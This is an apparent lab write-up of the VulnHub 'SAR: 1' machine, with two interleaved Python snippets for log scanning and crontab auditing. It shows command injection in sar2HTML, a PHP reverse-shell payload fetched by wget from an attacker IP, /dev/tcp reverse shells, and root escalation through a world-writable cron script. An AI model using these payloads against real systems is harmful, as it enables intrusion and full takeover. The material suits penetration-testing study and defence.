SAR: 1
https://www.vulnhub.com/entry/sar-1,425/
nmap scan
ip:192.168.54.13
# Nmap 7.93 scan initiated Tue May 16 09:18:11 2023 as: nmap --min-rate 20000 -p- -oN nmap/port 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:18:14 2023 -- 1 IP address (1 host up) scanned in 3.10 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:32 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.0014s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:18:35 2023 -- 1 IP address (1 host up) scanned in 3.12 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:45 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.13
Warning: 192.168.54.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.13
Host is up (0.00048s latency).
All 65535 scanned ports on 192.168.54.13 are in ignored states.
Not shown: 65493 open|filtered udp ports (no-response), 42 closed udp ports (port-unreach)
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:19:22 2023 -- 1 IP address (1 host up) scanned in 37.06 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:52 2023 as: nmap -sV -p80 -oN nmap/services 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:90:14:1A (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 16 09:19:00 2023 -- 1 IP address (1 host up) scanned in 7.74 seconds
# Nmap 7.93 scan initiated Tue May 16 09:19:07 2023 as: nmap -sC -p80 -oN nmap/script 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00025s latency).
PORT STATE SERVICE
80/tcp open http
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:19:13 2023 -- 1 IP address (1 host up) scanned in 5.92 seconds
# Nmap 7.93 scan initiated Tue May 16 09:19:39 2023 as: nmap --script=vuln -p80 -oN nmap/vuln 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00030s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /phpinfo.php: Possible information file
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:20:11 2023 -- 1 IP address (1 host up) scanned in 32.31 seconds
Port 80 web penetration
robots.txt exists, and opening it reveals sar2HTML. Opening http://192.168.54.13/sar2HTML shows that it is a tool, and the page also reports the version number: sar2html Ver 3.2.1.
Since it is a tool, there may be known vulnerabilities for it, so search for it with searchsploit.
# yunki @ yunki in ~/vulnhub/sar [9:25:41] C:130
$ searchsploit sar2html
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Two results, and both match the version in use, so let's try them.
# yunki @ yunki in ~/vulnhub/sar [9:31:26]
$ searchsploit -m 49344
Exploit: sar2html 3.2.1 - 'plot' Remote Code Execution
URL: https://www.exploit-db.com/exploits/49344
Path: /usr/share/exploitdb/exploits/php/webapps/49344.py
Codes: N/A
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/vulnhub/sar/49344.py
# yunki @ yunki in ~/vulnhub/sar [9:31:35]
$ searchsploit -m 47204
Exploit: Sar2HTML 3.2.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/47204
Path: /usr/share/exploitdb/exploits/php/webapps/47204.txt
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /home/yunki/vulnhub/sar/47204.txt
Try the first one first.
# yunki @ yunki in ~/vulnhub/sar [9:31:41]
$ cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.%
The command executed successfully, which confirms the vulnerability is present. Now try the Python script.
# yunki @ yunki in ~/vulnhub/sar [9:31:46]
$ python3 49344.py
Enter The url => http://192.168.54.13/sar2HTML/
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
Command =>
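From the defender's side, the injection shape described in the advisory above (a `plot` value that starts a second shell command) is easy to spot in the web server's access log. The following is an added example, not code from the original walkthrough or from the sar2html project: it parses Apache combined-format lines, decodes each query parameter by hand (so a `;` inside a value is never mistaken for a parameter separator) and flags values that contain shell metacharacters. The log lines are constructed for the example, modelled on the requests made above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines (not taken from the target machine).
# The first request uses a plausible plot name; the next two carry the
# ";<command>" shape from the advisory, the third one URL-encoded.
SAMPLE_LOG = """\
192.168.54.128 - - [16/May/2023:09:30:01 +0000] "GET /sar2HTML/index.php?plot=sar01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.54.128 - - [16/May/2023:09:31:46 +0000] "GET /sar2HTML/index.php?plot=;ls HTTP/1.1" 200 5310 "-" "python-requests/2.28.1"
192.168.54.128 - - [16/May/2023:09:42:37 +0000] "GET /sar2HTML/index.php?plot=%3Bwget%20http%3A%2F%2F192.168.54.128%2Fshell.txt HTTP/1.1" 200 5300 "-" "python-requests/2.28.1"
not a log line at all
"""

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that turn one shell word into a second command.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """Decode the query string manually: split only on '&', then percent-decode.

    urllib.parse.parse_qsl treated ';' as a separator in older Python versions,
    which would silently hide exactly the character we are looking for.
    """
    params = []
    for part in urlsplit(target).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return params


def injected_params(target):
    """(name, value) pairs whose decoded value contains shell metacharacters."""
    return [(n, v) for n, v in query_params(target) if SHELL_META.search(v)]


def scan_log(text):
    """Run the check over every parseable line and collect the suspicious requests."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in injected_params(rec["target"]):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "param": name,
                "value": value,
                "status": rec["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']!r} -> {f['status']}")
```

The check is deliberately generic: it looks at every parameter, not only `plot`, so it would also catch the same class of injection in a different application. A 200 status on such a request is worth treating as a successful execution until proven otherwise, since the advisory notes the output is simply rendered into the page.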
This script is effectively an interactive shell, but it is not very convenient, so let's set up a reverse shell instead.
Kali (attacker)
# yunki @ yunki in ~/vulnhub/sar [9:41:16]
$ vim shell.txt
# yunki @ yunki in ~/vulnhub/sar [9:42:02]
$ cat shell.txt
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>
# yunki @ yunki in ~/vulnhub/sar [9:42:08]
$ php -S 0:80
[Tue May 16 09:42:11 2023] PHP 7.4.15 Development Server (http://0:80) started
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Accepted
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 [200]: (null) /shell.txt
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Closing
Target machine
Command => wget http://192.168.54.128/shell.txt -O shell.php
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
shell.php
Start a listener on the port, then open http://192.168.54.13/shell.php.
The reverse shell connects back.
Getting a foothold on the system
# yunki @ yunki in ~/vulnhub/sar [9:46:21] C:1
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.13] 37552
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$
Privilege escalation
www-data@sar:/var/www/html/sar2HTML$ ls -liah
ls -liah
total 164K
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 .
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 ..
405911 -rwxr-xr-x 1 www-data www-data 35K Mar 14 2019 LICENSE
405981 -rwxr-xr-x 1 www-data www-data 53K Mar 19 2019 index.php
405908 -rwxr-xr-x 1 www-data www-data 52K Mar 19 2019 sar2html
426148 drwxr-xr-x 3 www-data www-data 4.0K Oct 20 2019 sarDATA
405912 drwxr-xr-x 3 www-data www-data 4.0K Mar 19 2019 sarFILE
401045 -rw-r--r-- 1 www-data www-data 76 May 16 07:12 shell.php
www-data@sar:/var/www/html/sar2HTML$ cd ..
cd ..
www-data@sar:/var/www/html$ ls
ls
finally.sh
index.html
phpinfo.php
robots.txt
sar2HTML
write.sh
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21 2019 ..
408197 -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data 11K Oct 20 2019 index.html
408195 -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
400981 -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
There is a scheduled task that runs as root, once every 5 minutes.
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21 2019 ..
408197 -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data 11K Oct 20 2019 index.html
408195 -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
400981 -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
write.sh is executed with root privileges, yet it is writable by us, so replace its contents with a reverse shell.
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.54.128/4444 0>&1
Then wait quietly for 5 minutes, and a reverse shell with root privileges comes back.
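The root cause of this escalation is a root cron job whose command chain ends in a script that a non-root user can write to. The following is an added audit example, not part of the original walkthrough: it parses `/etc/crontab` entries, tracks `cd` and strips a `sudo` wrapper, follows each script invoked by path into the scripts it in turn invokes, and reports any file in the chain that is group- or world-writable or owned by someone other than root or the job's user. The crontab text and the file ownership/mode table are constructed to mirror the listings above, so the block runs without touching a live system; replacing `FILES` with real `os.stat()` lookups is the only change needed to use it for real.

```python
import os
import re
import shlex

# Constructed sample data modelled on the listings above (nothing here is read
# from a live system).
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
"""

# path -> (owner, mode, content): what os.stat() and open().read() would return.
FILES = {
    "/var/www/html/finally.sh": ("root", 0o755, "#!/bin/sh\n./write.sh\n"),
    "/var/www/html/write.sh": ("www-data", 0o777, "#!/bin/sh\ntouch /tmp/gateway\n"),
}

# five schedule fields, the user field, then the command.
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;)\s*")


def split_commands(cmd):
    """Split a one-liner on && || ; into token lists, dropping a leading sudo."""
    out = []
    for segment in SEPARATORS.split(cmd):
        if not segment:
            continue
        try:
            tokens = shlex.split(segment)
        except ValueError:  # unbalanced quotes: nothing we can reason about
            continue
        while tokens and tokens[0] == "sudo":  # sudo changes the user, not the file
            tokens = tokens[1:]
        if tokens:
            out.append(tokens)
    return out


def problems_for(owner, mode, job_user):
    """Why a file run by job_user's cron entry could be tampered with."""
    probs = []
    if owner not in ("root", job_user):
        probs.append(f"owned by {owner}, not {job_user}")
    if mode & 0o020:
        probs.append("group-writable")
    if mode & 0o002:
        probs.append("world-writable")
    return probs


def follow(commands, cwd, job_user, files, seen, findings):
    """Walk token lists, tracking cd, and audit every executable named by a path."""
    for tokens in commands:
        if tokens[0] == "cd":
            # bare `cd` goes to $HOME; "/" is a stand-in since we have no passwd data
            cwd = os.path.normpath(os.path.join(cwd, tokens[1] if len(tokens) > 1 else "/"))
        elif "/" in tokens[0]:  # relative or absolute path; bare names resolve via PATH
            audit_script(os.path.normpath(os.path.join(cwd, tokens[0])), cwd,
                         job_user, files, seen, findings)
    return cwd


def audit_script(path, cwd, job_user, files, seen, findings):
    """Check one file's ownership/mode, then recurse into scripts it calls by path."""
    if path in seen or path not in files:
        return  # already audited, or no metadata for it (e.g. a binary on PATH)
    seen.add(path)
    owner, mode, content = files[path]
    probs = problems_for(owner, mode, job_user)
    if probs:
        findings.append({"path": path, "owner": owner, "mode": oct(mode), "problems": probs})
    for line in content.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            cwd = follow(split_commands(line), cwd, job_user, files, seen, findings)


def audit_crontab(text, files):
    """Audit every job entry in a system crontab and return the weak links found."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        m = CRON_LINE.match(line)
        if not m:
            continue
        follow(split_commands(m.group("cmd")), "/", m.group("user"), files, set(), findings)
    return findings


if __name__ == "__main__":
    for f in audit_crontab(CRONTAB, FILES):
        print(f"{f['path']} ({f['owner']}, {f['mode']}): {'; '.join(f['problems'])}")
```

On the data above the only finding is `/var/www/html/write.sh`: `finally.sh` itself is root-owned and 0755, so a check that stops at the first script would miss the problem. The fix on the target side is the mirror image of the report: root-owned, 0755 scripts for anything cron runs as root, and no `sudo` inside a job that already runs as root.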
Done
root@sar:/var/www/html# whoami
whoami
root
root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:90:14:1a brd ff:ff:ff:ff:ff:ff
inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
valid_lft 293sec preferred_lft 293sec
inet6 fe80::c3cf:34f9:1c23:4932/64 scope link noprefixroute
valid_lft forever preferred_lft forever
root@sar:~# uname -a
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux